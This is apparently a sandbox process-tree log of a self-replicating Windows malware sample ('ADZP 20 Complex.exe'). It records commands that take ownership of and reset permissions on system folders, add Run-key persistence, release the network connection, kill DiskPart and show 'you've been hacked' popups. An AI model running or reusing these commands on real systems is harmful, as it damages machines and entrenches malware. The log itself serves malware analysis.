C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E54F.tmp\E550.tmp\E551.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7F58.tmp\7F68.tmp\7F69.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado11⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4038.tmp\4039.tmp\403A.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""12⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat13⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f13⤵
-
C:\Windows\system32\notepad.exenotepad11⤵
-
C:\Windows\system32\calc.execalc11⤵
-
C:\Windows\explorer.exeexplorer.exe11⤵
-
C:\Windows\system32\mspaint.exemspaint.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"11⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C774.tmp\C775.tmp\C776.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""12⤵
-
C:\Windows\system32\notepad.exenotepad11⤵
-
C:\Windows\system32\calc.execalc11⤵
-
C:\Windows\explorer.exeexplorer.exe11⤵
-
C:\Windows\system32\mspaint.exemspaint.exe11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\908E.tmp\908F.tmp\9090.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EEB5.tmp\EEB6.tmp\EEB7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies registry class
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5DD.tmp\5DE.tmp\5DF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1AAD.tmp\1AAE.tmp\1AAF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\notepad.exenotepad5⤵
-
C:\Windows\system32\calc.execalc5⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe5⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81E.tmp\81F.tmp\820.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r8⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
